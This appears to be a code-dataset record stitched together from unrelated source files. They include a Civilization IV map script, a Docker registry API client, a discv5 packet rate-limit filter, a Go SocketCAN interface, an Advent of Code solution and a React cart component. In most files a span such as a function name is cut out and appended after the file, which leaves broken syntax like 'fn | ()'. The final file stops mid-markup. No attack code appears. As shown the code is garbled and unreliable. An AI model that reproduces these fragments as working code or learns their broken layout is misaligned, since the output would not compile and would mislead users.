WorldSizeTypes.WORLDSIZE_LARGE: 2,
WorldSizeTypes.WORLDSIZE_HUGE: 3
}
sizemodifier = sizevalues[sizekey]
# playermodifier involves two layers of randomnity.
players = gc.getGame().countCivPlayersEverAlive()
plrcomponent1 = int(players / 3.0) # Bonus Method Fixed Component
plrcomponent2 = dice.get(players, "Bonus Method Abundant Component - Fantasy Realm PYTHON") + 1
plrcomponent3 = dice.get(int(players / 1.6), "Bonus Method Medium Component - Fantasy Realm PYTHON") - 1
plrmethods = [plrcomponent1, plrcomponent2, plrcomponent3, plrcomponent2]
playermodifier = plrmethods[dice.get(4, "Bonus Method - Fantasy Realm PYTHON")]
count = sizemodifier + playermodifier
if count <= 0:
return None # This bonus drew a short straw. None will be placed!
# Set plot eligibility for current bonus.
# Begin by initiating the list, into which eligible plots will be recorded.
eligible = []
# Loop through all plots on the map, adding eligible plots to the list.
for x in range(iW):
for y in range(iH):
# First check the plot for an existing bonus.
pPlot = map.plot(x,y)
if pPlot.isPeak() or pPlot.isWater(): continue # to next plot.
if pPlot.getBonusType(-1) != -1: continue # to next plot.
if pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_OASIS"): continue # Soren wants no bonuses in oasis plots. So mote it be.
# Check plot type and features for eligibility.
if forceHills and not pPlot.isHills(): continue
if forceFlats and not pPlot.isFlatlands(): continue
if forceFlood and not pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_FLOOD_PLAINS"): continue
if forceJungle and not pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_JUNGLE"): continue
if forceForest and not pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_FOREST"): continue
if forceNoGrass and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_GRASS"): continue
if forceNoDesert and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_DESERT"): continue
if forceNoSnow and (pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_TUNDRA") or pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_SNOW")): continue
if forceNoPlains and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_PLAINS"): continue
if forceNoJungle and pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_JUNGLE"): continue
if forceNoForest and pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_FOREST"): continue
if forceNoFresh and pPlot.isFreshWater(): continue
#
# Finally we have run all the checks.
# 1. The plot has no bonus.
# 2. The plot has an eligible terrain and feature type.
# Now we append this plot to the eligible list.
eligible.append([x,y])
# Now we assign the bonuses to eligible plots chosen completely at random.
while count > 0:
if eligible == []: break # No eligible plots left!
index = dice.get(len(eligible), "Bonus Placement - Fantasy Realm PYTHON")
[x,y] = eligible[index]
map.plot(x,y).setBonusType(iBonusType)
del eligible[index] # Remove this plot from the eligible list.
count = count - 1 # Reduce number of bonuses left to place.
# This bonus type is done.
return None
def afterGeneration():
gc = CyGlobalContext()
map = CyMap()
userInputResources = map.getCustomMapOption(0)
if userInputResources != 2: # Logical or Irrational resources (already handled).
return None
# Place "Crazy" resources!
NiTextOut("Placing Crazy Resources (Python Fantasy Realm) ...")
global crazy_food, crazy_luxury, crazy_strategic, crazy_late_game, crazy_types
dice = gc.getGame().getMapRand()
iW = map.getGridWidth()
iH = map.getGridHeight()
crazies = CyFractal()
crazies.fracInit(iW, iH, 7, dice, 0, -1, -1)
crazyOne = crazies.getHeightFromPercent(10)
crazyTwo = crazies.getHeightFromPercent(30)
crazyThree = crazies.getHeightFromPercent(45)
crazyFour = crazies.getHeightFromPercent(55)
crazyFive = crazies.getHeightFromPercent(70)
for x in range(iW):
for y in range(iH):
# Fractalized placement of crazy resources.
pPlot = map.plot(x,y)
if pPlot.getBonusType(-1) != -1: continue # A bonus already exists in this plot!
if pPlot.isWater() or pPlot.isPeak() or pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_OASIS"): continue
crazyVal = crazies.getHeight(x,y)
for crazy_bonus in crazy_types:
type_string = gc.getBonusInfo(crazy_bonus).getType()
if type_string == crazy_food:
if (crazyVal >= crazyTwo and crazyVal < crazyThree) and (pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_TUNDRA") or pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_SNOW")):
map.plot(x,y).setBonusType(crazy_bonus)
if type_string == crazy_luxury:
if (crazyVal >= crazyFour and crazyVal < crazyFive) and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_GRASS"):
map.plot(x,y).setBonusType(crazy_bonus)
if type_string == crazy_strategic:
if (crazyVal >= crazyThree and crazyVal < crazyFour) and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_PLAINS"):
map.plot(x,y).setBonusType(crazy_bonus)
if type_string == crazy_late_game:
if (crazyVal >= crazyOne and crazyVal < crazyTwo) and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_DESERT"):
map.plot(x,y).setBonusType(crazy_bonus)
# Finito
return None
def normalizeRemovePeaks():
return None
def normalizeRemoveBadTerrain():
return None
def normalizeRemoveBadFeatures():
return None
def normalizeAddGoodTerrain():
return None
| addFloodAtPlot |
main.rs | use fantoccini::{Client, Locator};
use std::time::Duration;
use tokio::time::delay_for;
#[tokio::main]
async fn | () -> Result<(), Box<dyn std::error::Error>> {
// expects WebDriver instance to be listening at port 4444
let mut client = Client::new("http://localhost:4444")
.await
.expect("failed to connect to WebDriver");
client.goto("https://www.rust-lang.org/").await?;
// delay_for is an artificial delay only used to see the browsers actions and not necessary
// in your own code
delay_for(Duration::from_millis(3000)).await;
let get_started_button =
r#"//a[@class="button button-download ph4 mt0 w-100" and @href="/learn/get-started"]"#;
let element = client.find(Locator::XPath(get_started_button)).await?;
element.click().await?;
delay_for(Duration::from_millis(3000)).await;
let try_without_installing_button =
r#"//a[@class="button button-secondary" and @href="https://play.rust-lang.org/"]"#;
let element = client
.find(Locator::XPath(try_without_installing_button))
.await?;
element.click().await?;
delay_for(Duration::from_millis(3000)).await;
let play_rust_lang_run_button = r#"//div[@class="segmented-button"]/button[1]"#;
let element = client
.find(Locator::XPath(play_rust_lang_run_button))
.await?;
element.click().await?;
delay_for(Duration::from_millis(6000)).await;
Ok(())
}
| main |
registry.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# bug-report: [email protected]
""" api for docker registry """
import urllib2
import urllib
import json
import base64
class RegistryException(Exception):
""" registry api related exception """
pass
class RegistryApi(object):
""" interact with docker registry and harbor """
def __init__(self, username, password, registry_endpoint):
self.username = username
self.password = password
self.basic_token = base64.encodestring("%s:%s" % (str(username), str(password)))[0:-1]
self.registry_endpoint = registry_endpoint.rstrip('/')
#print("%s/v2/_catalog" % (self.registry_endpoint,))
auth = self.pingRegistry("%s/v2/_catalog" % (self.registry_endpoint,))
if auth is None:
raise RegistryException("get token realm and service failed")
self.token_endpoint = auth[0]
self.service = auth[1]
def pingRegistry(self, registry_endpoint):
""" ping v2 registry and get realm and service """
headers = dict()
try:
res = urllib2.urlopen(registry_endpoint) | try:
(realm, service, _) = headers['www-authenticate'].split(',')
return (realm[14:-1:], service[9:-1])
except Exception as e:
return None
def getBearerTokenForScope(self, scope):
""" get bearer token from harbor """
payload = urllib.urlencode({'service': self.service, 'scope': scope})
url = "%s?%s" % (self.token_endpoint, payload)
req = urllib2.Request(url)
req.add_header('Authorization', 'Basic %s' % (self.basic_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())["token"]
except Exception as e:
return None
def getRepositoryList(self, n=None):
""" get repository list """
scope = "registry:catalog:*"
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/_catalog" % (self.registry_endpoint,)
if n is not None:
url = "%s?n=%s" % (url, str(n))
req = urllib2.Request(url)
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def getTagList(self, repository):
""" get tag list for repository """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/tags/list" % (self.registry_endpoint, repository)
req = urllib2.Request(url)
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def getManifest(self, repository, reference="latest", v1=False):
""" get manifest for tag or digest """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, reference)
req = urllib2.Request(url)
req.get_method = lambda: 'GET'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
if v1:
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v1+json')
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def existManifest(self, repository, reference, v1=False):
""" check to see it manifest exist """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
raise RegistryException("manifestExist failed due to token error")
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, reference)
req = urllib2.Request(url)
req.get_method = lambda: 'HEAD'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
if v1:
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v1+json')
try:
response = urllib2.urlopen(req)
return (True, response.headers.dict["docker-content-digest"])
except Exception as e:
return (False, None)
def deleteManifest(self, repository, reference):
""" delete manifest by tag """
(is_exist, digest) = self.existManifest(repository, reference)
if not is_exist:
raise RegistryException("manifest not exist")
scope = "repository:%s:pull,push" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
raise RegistryException("delete manifest failed due to token error")
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, digest)
req = urllib2.Request(url)
req.get_method = lambda: 'DELETE'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
urllib2.urlopen(req)
except Exception as e:
return False
return True
def getManifestWithConf(self, repository, reference="latest"):
""" get manifest for tag or digest """
manifest = self.getManifest(repository, reference)
if manifest is None:
raise RegistryException("manifest for %s %s not exist" % (repository, reference))
config_digest = manifest["config"]["digest"]
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/blobs/%s" % (self.registry_endpoint, repository, config_digest)
req = urllib2.Request(url)
req.get_method = lambda: 'GET'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
try:
response = urllib2.urlopen(req)
manifest["configContent"] = json.loads(response.read())
return manifest
except Exception as e:
return None | except urllib2.HTTPError as e:
headers = e.hdrs.dict |
gyptest-link-base-address.py | #!/usr/bin/env python
# Copyright 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure the base address setting is extracted properly.
"""
import TestGyp
import re
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
test.run_gyp('base-address.gyp', chdir=CHDIR)
test.build('base-address.gyp', test.ALL, chdir=CHDIR)
def GetHeaders(exe):
full_path = test.built_file_path(exe, chdir=CHDIR)
return test.run_dumpbin('/headers', full_path)
# Extract the image base address from the headers output.
image_base_reg_ex = re.compile(r'.*\s+([0-9]+) image base.*', re.DOTALL)
exe_headers = GetHeaders('test_base_specified_exe.exe')
exe_match = image_base_reg_ex.match(exe_headers)
| test.fail_test()
if exe_match.group(1) != '420000':
test.fail_test()
dll_headers = GetHeaders('test_base_specified_dll.dll')
dll_match = image_base_reg_ex.match(dll_headers)
if not dll_match or not dll_match.group(1):
test.fail_test()
if dll_match.group(1) != '10420000':
test.fail_test()
default_exe_headers = GetHeaders('test_base_default_exe.exe')
default_exe_match = image_base_reg_ex.match(default_exe_headers)
if not default_exe_match or not default_exe_match.group(1):
test.fail_test()
if default_exe_match.group(1) != '400000':
test.fail_test()
default_dll_headers = GetHeaders('test_base_default_dll.dll')
default_dll_match = image_base_reg_ex.match(default_dll_headers)
if not default_dll_match or not default_dll_match.group(1):
test.fail_test()
if default_dll_match.group(1) != '10000000':
test.fail_test()
test.pass_test() |
if not exe_match or not exe_match.group(1):
|
fn-ptr-shim.rs | // compile-flags: -Zmir-opt-level=0 -Zvalidate-mir
// Tests that the `<fn() as Fn>` shim does not create a `Call` terminator with a `Self` callee
// (as only `FnDef` and `FnPtr` callees are allowed in MIR).
// EMIT_MIR core.ops-function-Fn-call.AddMovesForPackedDrops.before.mir
fn | () {
call(noop as fn());
}
fn noop() {}
fn call<F: Fn()>(f: F) {
f();
}
| main |
pipeline_utils.py | """
File: pipeline_utils.py
Author: Jens Petit
Email: [email protected]
Github: https://github.com/j-petit
Description: Utility functions for filtering models
"""
import re
def createDiffs(model1, model2, filename):
"""Takes two models and creates constraint variables out of their paths.
Parameters
----------
model1 : mplus model object
model2 : mplus model object
filename : string where to write diffs
"""
if len(model1.model) != len(model2.model):
raise Exception("Models not the same")
no_lines = len(model1.model)
not_diffs = 0
for i in range(no_lines):
if model1.labels[i] == model2.labels[i]:
not_diffs = not_diffs + 1
lines = []
start_line = "new(diff0-diff{});".format(no_lines - not_diffs - 1)
counter = 0
for i in range(no_lines):
if model1.labels[i] == model2.labels[i]:
line = "diffX = {1} - {2};".format(i, model1.labels[i],
model2.labels[i])
line = "! " + line
else:
line = "diff{0} = {1} - {2};".format(counter, model1.labels[i],
model2.labels[i])
counter = counter + 1
lines.append(line)
with open(filename, 'a') as f:
f.write("MODEL CONSTRAINT:\n")
f.write(start_line + "\n")
for line in lines:
f.write(line + "\n")
def filterDiffs(threshold, filename, var_name):
| """Searches for lines starting with var_name in file and indexes them.
Parameters
----------
threshold : float indicating which lines to consider
filename : string specifying file
var_name : string to search for in file
"""
to_match = '^' + var_name.upper()
match_counter = 0
same_paths = []
with open(filename) as fp:
for line in fp:
line = line.strip(None)
if (line == "New/Additional Parameters"):
found = True
if (line == ""):
found = False
if (re.match(to_match, line) and found):
value = float(line.split()[4])
if value < threshold:
same_paths.append(match_counter)
match_counter = match_counter + 1
return same_paths |
|
mod.rs | //! A filter which decides whether to accept/reject incoming UDP packets.
use crate::{discv5::PERMIT_BAN_LIST, metrics::METRICS, node_info::NodeAddress, packet::Packet};
use cache::ReceivedPacketCache;
use enr::NodeId;
use lru::LruCache;
use std::{
collections::HashSet,
net::{IpAddr, SocketAddr},
sync::atomic::Ordering,
time::{Duration, Instant},
};
use tracing::{debug, warn};
mod cache;
mod config;
pub mod rate_limiter;
pub use config::FilterConfig;
use rate_limiter::{LimitKind, RateLimiter};
/// The maximum number of IPs to retain when calculating the number of nodes per IP.
const KNOWN_ADDRS_SIZE: usize = 500;
/// The number of IPs to retain at any given time that have banned nodes.
const BANNED_NODES_SIZE: usize = 50;
/// The maximum number of packets to keep record of for metrics if the rate limiter is not
/// specified.
const DEFAULT_PACKETS_PER_SECOND: usize = 20;
/// The packet filter which decides whether we accept or reject incoming packets.
pub(crate) struct Filter {
/// Whether the filter is enabled or not.
enabled: bool,
/// An optional rate limiter for incoming packets.
rate_limiter: Option<RateLimiter>,
/// An ordered (by time) collection of recently seen packets by SocketAddr. The packet data is not
/// stored here. This stores 5 seconds of history to calculate a 5 second moving average for
/// the metrics.
raw_packets_received: ReceivedPacketCache<SocketAddr>,
/// The duration that bans by this filter last.
ban_duration: Option<Duration>,
/// Keep track of node ids per socket. If someone is using too many node-ids per IP, they can
/// be banned.
known_addrs: LruCache<IpAddr, HashSet<NodeId>>,
/// Keep track of Ips that have banned nodes. If a single IP has many nodes that get banned,
/// then we ban the IP address.
banned_nodes: LruCache<IpAddr, usize>,
/// The maximum number of node-ids allowed per IP address before the IP address gets banned.
/// Having this set to None, disables this feature. Default value is 10.
pub max_nodes_per_ip: Option<usize>,
/// The maximum number of nodes that can be banned by a single IP before that IP gets banned.
/// The default is 5.
pub max_bans_per_ip: Option<usize>,
}
impl Filter {
pub fn new(config: FilterConfig, ban_duration: Option<Duration>) -> Filter {
let expected_packets_per_second = config
.rate_limiter
.as_ref()
.map(|v| v.total_requests_per_second().round() as usize)
.unwrap_or(DEFAULT_PACKETS_PER_SECOND);
Filter {
enabled: config.enabled,
rate_limiter: config.rate_limiter,
raw_packets_received: ReceivedPacketCache::new(
expected_packets_per_second,
METRICS.moving_window,
),
known_addrs: LruCache::new(KNOWN_ADDRS_SIZE),
banned_nodes: LruCache::new(BANNED_NODES_SIZE),
ban_duration,
max_nodes_per_ip: config.max_nodes_per_ip,
max_bans_per_ip: config.max_bans_per_ip,
}
}
/// The first check. This determines if a new UDP packet should be decoded or dropped.
/// Only unsolicited packets arrive here.
pub fn initial_pass(&mut self, src: &SocketAddr) -> bool {
if PERMIT_BAN_LIST.read().permit_ips.get(&src.ip()).is_some() {
return true;
}
if PERMIT_BAN_LIST.read().ban_ips.get(&src.ip()).is_some() {
debug!("Dropped unsolicited packet from banned src: {:?}", src);
return false;
}
// Add the un-solicited request to the cache
// If this is over the maximum requests per ENFORCED_SIZE_TIME, it will not be added, we
// leave the rate limiter to enforce the rate limits..
let _ = self.raw_packets_received.cache_insert(*src);
// build the metrics
METRICS
.unsolicited_requests_per_window
.store(self.raw_packets_received.len(), Ordering::Relaxed);
// If the filter isn't enabled, pass the packet
if !self.enabled {
return true;
}
// Check rate limits
if let Some(rate_limiter) = self.rate_limiter.as_mut() {
if rate_limiter.allows(&LimitKind::Ip(src.ip())).is_err() {
warn!("Banning IP for excessive requests: {:?}", src.ip());
// Ban the IP address
let ban_timeout = self.ban_duration.map(|v| Instant::now() + v);
PERMIT_BAN_LIST
.write()
.ban_ips
.insert(src.ip(), ban_timeout);
return false;
}
if rate_limiter.allows(&LimitKind::Total).is_err() {
debug!("Dropped unsolicited packet from RPC limit: {:?}", src.ip());
return false;
}
}
true
}
pub fn final_pass(&mut self, node_address: &NodeAddress, _packet: &Packet) -> bool {
if PERMIT_BAN_LIST
.read()
.permit_nodes
.get(&node_address.node_id)
.is_some()
{
return true;
}
if PERMIT_BAN_LIST
.read()
.ban_nodes
.get(&node_address.node_id)
.is_some()
{
debug!(
"Dropped unsolicited packet from banned node_id: {}",
node_address
);
return false;
}
// If the filter isn't enabled, just pass the packet.
if !self.enabled {
return true;
}
if let Some(rate_limiter) = self.rate_limiter.as_mut() {
if rate_limiter
.allows(&LimitKind::NodeId(node_address.node_id))
.is_err()
{
warn!(
"Node has exceeded its request limit and is now banned {}",
node_address.node_id
);
// The node is being banned
let ban_timeout = self.ban_duration.map(|v| Instant::now() + v);
PERMIT_BAN_LIST
.write()
.ban_nodes
.insert(node_address.node_id, ban_timeout);
// If we are tracking banned nodes per IP, add to the count. If the count is higher
// than our tolerance, ban the IP.
if let Some(max_bans_per_ip) = self.max_bans_per_ip {
let ip = node_address.socket_addr.ip();
if let Some(banned_count) = self.banned_nodes.get_mut(&ip) {
*banned_count += 1;
if *banned_count >= max_bans_per_ip {
PERMIT_BAN_LIST.write().ban_ips.insert(ip, ban_timeout);
}
} else {
self.banned_nodes.put(ip, 0);
}
}
return false;
}
}
// Check the nodes per IP filter configuration
if let Some(max_nodes_per_ip) = self.max_nodes_per_ip {
// This option is set, store the known nodes per IP.
let ip = node_address.socket_addr.ip();
let known_nodes = {
if let Some(known_nodes) = self.known_addrs.get_mut(&ip) {
known_nodes.insert(node_address.node_id);
known_nodes.len()
} else {
let mut ids = HashSet::new();
ids.insert(node_address.node_id);
self.known_addrs.put(ip, ids);
1
}
};
if known_nodes >= max_nodes_per_ip {
warn!("IP has exceeded its node-id limit and is now banned {}", ip);
// The node is being banned
let ban_timeout = self.ban_duration.map(|v| Instant::now() + v);
PERMIT_BAN_LIST.write().ban_ips.insert(ip, ban_timeout);
self.known_addrs.pop(&ip);
return false;
}
}
true
}
pub fn | (&mut self) {
if let Some(rate_limiter) = self.rate_limiter.as_mut() {
rate_limiter.prune();
}
}
}
| prune_limiter |
interface_raw.go | package socketcan
import (
"encoding/binary"
"fmt"
"golang.org/x/sys/unix"
)
func | (ifName string) (Interface, error) {
canIf := Interface{}
canIf.ifType = IF_TYPE_RAW
fd, err := unix.Socket(unix.AF_CAN, unix.SOCK_RAW, CAN_RAW)
if err != nil {
return canIf, err
}
ifIndex, err := getIfIndex(fd, ifName)
if err != nil {
return canIf, err
}
addr := &unix.SockaddrCAN{Ifindex: ifIndex}
if err = unix.Bind(fd, addr); err != nil {
return canIf, err
}
canIf.IfName = ifName
canIf.SocketFd = fd
return canIf, nil
}
func (i Interface) SendFrame(f CanFrame) error {
if i.ifType != IF_TYPE_RAW {
return fmt.Errorf("interface is not raw type")
}
// assemble a SocketCAN frame
frameBytes := make([]byte, 16)
// bytes 0-3: arbitration ID
if f.ArbId < 0x800 {
// standard ID
binary.LittleEndian.PutUint32(frameBytes[0:4], f.ArbId)
} else {
// extended ID
// set bit 31 (frame format flag (0 = standard 11 bit, 1 = extended 29 bit)
binary.LittleEndian.PutUint32(frameBytes[0:4], f.ArbId|1<<31)
}
// byte 4: data length code
frameBytes[4] = f.Dlc
// data
copy(frameBytes[8:], f.Data)
_, err := unix.Write(i.SocketFd, frameBytes)
return err
}
func (i Interface) RecvFrame() (CanFrame, error) {
f := CanFrame{}
if i.ifType != IF_TYPE_RAW {
return f, fmt.Errorf("interface is not raw type")
}
// read SocketCAN frame from device
frameBytes := make([]byte, 16)
_, err := unix.Read(i.SocketFd, frameBytes)
if err != nil {
return f, err
}
// bytes 0-3: arbitration ID
f.ArbId = uint32(binary.LittleEndian.Uint32(frameBytes[0:4]))
// byte 4: data length code
f.Dlc = frameBytes[4]
// data
f.Data = make([]byte, 8)
copy(f.Data, frameBytes[8:])
return f, nil
}
| NewRawInterface |
day22.rs | use advent_of_code_2021::util::lines;
use std::collections::HashSet;
#[derive(Debug, Eq, PartialEq, Copy, Clone, Hash)]
struct Dot {
x: isize,
y: isize,
z: isize,
}
#[derive(Debug, Eq, PartialEq, Copy, Clone, Hash)]
struct Cube {
x0: isize,
x1: isize,
y0: isize,
y1: isize,
z0: isize,
z1: isize,
}
impl Cube {
fn dots(&self) -> Vec<Dot> {
let mut dots = Vec::new();
for x in self.x0..=self.x1 {
for y in self.y0..=self.y1 {
for z in self.z0..=self.z1 {
let dot = Dot { x, y, z };
dots.push(dot);
}
}
}
dots
}
fn size(&self) -> usize {
(self.x1 - self.x0 + 1).abs() as usize
* (self.y1 - self.y0 + 1).abs() as usize
* (self.z1 - self.z0 + 1).abs() as usize
}
fn and(&self, that: &Cube) -> Option<Cube> {
let (x0, x1) = overlap(self.x0, self.x1, that.x0, that.x1)?;
let (y0, y1) = overlap(self.y0, self.y1, that.y0, that.y1)?;
let (z0, z1) = overlap(self.z0, self.z1, that.z0, that.z1)?;
Some(Cube {
x0,
x1,
y0,
y1,
z0,
z1,
})
}
}
fn overlap(a: isize, b: isize, c: isize, d: isize) -> Option<(isize, isize)> {
let a0 = a.min(b);
let a1 = a.max(b);
let b0 = c.min(d);
let b1 = c.max(d);
if a0 < b0 && a1 < b0 {
return None;
}
if a0 > b1 && a1 > b1 {
return None;
}
Some((a0.max(b0), a1.min(b1)))
}
fn parse(s: &str) -> (bool, Cube) {
let mut it = s.split_whitespace();
let flag_part = it.next().unwrap();
let mut cube_part = it.next().unwrap().split(',');
let mut x_range = cube_part
.next()
.unwrap()
.split('=')
.nth(1)
.unwrap()
.split("..");
let mut y_range = cube_part
.next()
.unwrap()
.split('=')
.nth(1)
.unwrap()
.split("..");
let mut z_range = cube_part
.next()
.unwrap()
.split('=')
.nth(1)
.unwrap()
.split("..");
let cube = Cube {
x0: x_range.next().unwrap().parse().unwrap(),
x1: x_range.next().unwrap().parse().unwrap(),
y0: y_range.next().unwrap().parse().unwrap(),
y1: y_range.next().unwrap().parse().unwrap(),
z0: z_range.next().unwrap().parse().unwrap(),
z1: z_range.next().unwrap().parse().unwrap(),
};
match flag_part {
"on" => (true, cube),
"off" => (false, cube),
_ => unreachable!(),
}
}
fn part1(ops: &[(bool, Cube)], init: &Cube) -> usize {
ops.iter()
.flat_map(|(flag, cube)| {
cube.and(init)
.map(|c| c.dots())
.unwrap_or_default()
.into_iter()
.map(|d| (flag, d))
.collect::<Vec<_>>()
}) | set.remove(&dot);
}
set
})
.len()
}
fn cut_one(a: isize, b: isize, c: isize, d: isize) -> Vec<(isize, isize)> {
assert!(a <= c);
assert!(b >= d);
// match
// a b
// |-----------|
// c d
// |-----------|
// a b
// |-----------|
if a == c && b == d {
return vec![(a, b)];
}
// lo end
// a b
// |------------|
// c d
// |--------|
// c d b
// |--------||--|
if a == c && d < b {
return vec![(a, d), (d + 1, b)];
}
// hi end
// a b
// |------------|
// c d
// ----|--------|
// a c d
// |--||--------|
if c > a && d == b {
return vec![(a, c - 1), (c, d)];
}
// middle
// a b
// |-------------|
// c d
// ---|------|----
// a c d b
// |-||------||--|
vec![(a, c - 1), (c, d), (d + 1, b)]
}
fn cut(this: &Cube, that: &Cube) -> Vec<Cube> {
if let Some(that) = this.and(that) {
let mut cubes = Vec::new();
for (x0, x1) in cut_one(this.x0, this.x1, that.x0, that.x1) {
for (y0, y1) in cut_one(this.y0, this.y1, that.y0, that.y1) {
for (z0, z1) in cut_one(this.z0, this.z1, that.z0, that.z1) {
let cube = Cube {
x0,
x1,
y0,
y1,
z0,
z1,
};
if cube == that {
continue;
}
cubes.push(cube);
}
}
}
cubes
} else {
vec![*this]
}
}
fn part2(ops: &[(bool, Cube)]) -> usize {
let mut done: Vec<Cube> = Vec::new();
for (flag, cube) in ops {
done = done.into_iter().flat_map(|x| cut(&x, cube)).collect();
if *flag {
done.push(*cube);
}
}
done.into_iter().map(|cube| cube.size()).sum()
}
fn main() {
let ops = lines().into_iter().map(|s| parse(&s)).collect::<Vec<_>>();
let init = Cube {
x0: -50,
x1: 50,
y0: -50,
y1: 50,
z0: -50,
z1: 50,
};
let part1 = part1(&ops, &init);
println!("{}", part1);
let part1_ops = ops
.iter()
.cloned()
.flat_map(|(flag, cube)| cube.and(&init).map(|cube| (flag, cube)))
.collect::<Vec<_>>();
assert_eq!(part2(&part1_ops), part1);
println!("{}", part2(&ops));
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_parse() {
assert_eq!(
parse("on x=-20..26,y=-36..17,z=-47..7"),
(
true,
(Cube {
x0: -20,
x1: 26,
y0: -36,
y1: 17,
z0: -47,
z1: 7
})
)
);
}
#[test]
fn test_size() {
assert_eq!(
Cube {
x0: 0,
x1: 0,
y0: 0,
y1: 0,
z0: 0,
z1: 0,
}
.size(),
1
);
assert_eq!(
Cube {
x0: 0,
x1: 6,
y0: 0,
y1: 4,
z0: 0,
z1: 0,
}
.size(),
35
);
}
} | .fold(HashSet::new(), |mut set, (on, dot)| {
if *on {
set.insert(dot);
} else { |
patched_tag_update.rs | /*
* CloudTruth Management API
*
* CloudTruth centralizes your configuration parameters and secrets making them easier to manage and use as a team.
*
* The version of the OpenAPI document: 1.0.0
* Contact: [email protected]
* Generated by: https://openapi-generator.tech
*/
/// PatchedTagUpdate : Details for updating a tag.
#[derive(Clone, Debug, PartialEq, Default, Serialize, Deserialize)]
pub struct | {
/// A unique identifier for the tag.
#[serde(rename = "id", skip_serializing_if = "Option::is_none")]
pub id: Option<String>,
/// The tag name. Tag names may contain alphanumeric, hyphen, underscore, or period characters. Tag names are case sensitive. The name cannot be modified.
#[serde(rename = "name", skip_serializing_if = "Option::is_none")]
pub name: Option<String>,
/// A description of the tag. You may find it helpful to document how this tag is used to assist others when they need to maintain software that uses this content.
#[serde(rename = "description", skip_serializing_if = "Option::is_none")]
pub description: Option<String>,
/// The point in time this tag represents. If explicitly set to `null` then the current time will be used.
#[serde(rename = "timestamp", skip_serializing_if = "Option::is_none")]
pub timestamp: Option<String>,
}
impl PatchedTagUpdate {
/// Details for updating a tag.
pub fn new() -> PatchedTagUpdate {
PatchedTagUpdate {
id: None,
name: None,
description: None,
timestamp: None,
}
}
}
| PatchedTagUpdate |
index.tsx | import React, { useCallback, useMemo } from 'react';
import FeatherIcon from 'react-native-vector-icons/Feather';
import { View } from 'react-native';
import {
Container,
ProductContainer,
ProductList,
Product,
ProductImage,
ProductTitleContainer,
ProductTitle,
ProductPriceContainer,
ProductSinglePrice,
TotalContainer,
ProductPrice,
ProductQuantity,
ActionContainer,
ActionButton,
TotalProductsContainer,
TotalProductsText,
SubtotalValue,
} from './styles';
import { useCart } from '../../hooks/cart';
import formatValue from '../../utils/formatValue';
interface Product {
id: string;
title: string;
image_url: string;
price: number;
quantity: number;
}
const Cart: React.FC = () => {
const { increment, decrement, products } = useCart();
const handleIncrement = useCallback(
(id: string): void => {
increment(id);
},
[increment],
);
const handleDecrement = useCallback(
(id: string): void => {
decrement(id);
},
[decrement],
);
const cartTotal = useMemo(() => {
const prices = products.map(product => {
return product.price * product.quantity;
});
const total = prices.reduce(
(accumulator, currentValue) => accumulator + currentValue,
0,
);
return formatValue(total);
}, [products]);
const totalItensInCart = useMemo(() => {
const totalPerProduct = products.map(product => product.quantity);
const total = totalPerProduct.reduce(
(accumulator, currentValue) => accumulator + currentValue,
0,
);
return total;
}, [products]);
return (
<Container>
<ProductContainer>
<ProductList
data={products}
keyExtractor={item => item.id}
ListFooterComponent={<View />}
ListFooterComponentStyle={{
height: 80,
}}
renderItem={({ item }: { item: Product }) => (
<Product>
<ProductImage source={{ uri: item.image_url }} />
<ProductTitleContainer>
<ProductTitle>{item.title}</ProductTitle>
<ProductPriceContainer>
<ProductSinglePrice>
{formatValue(item.price)}
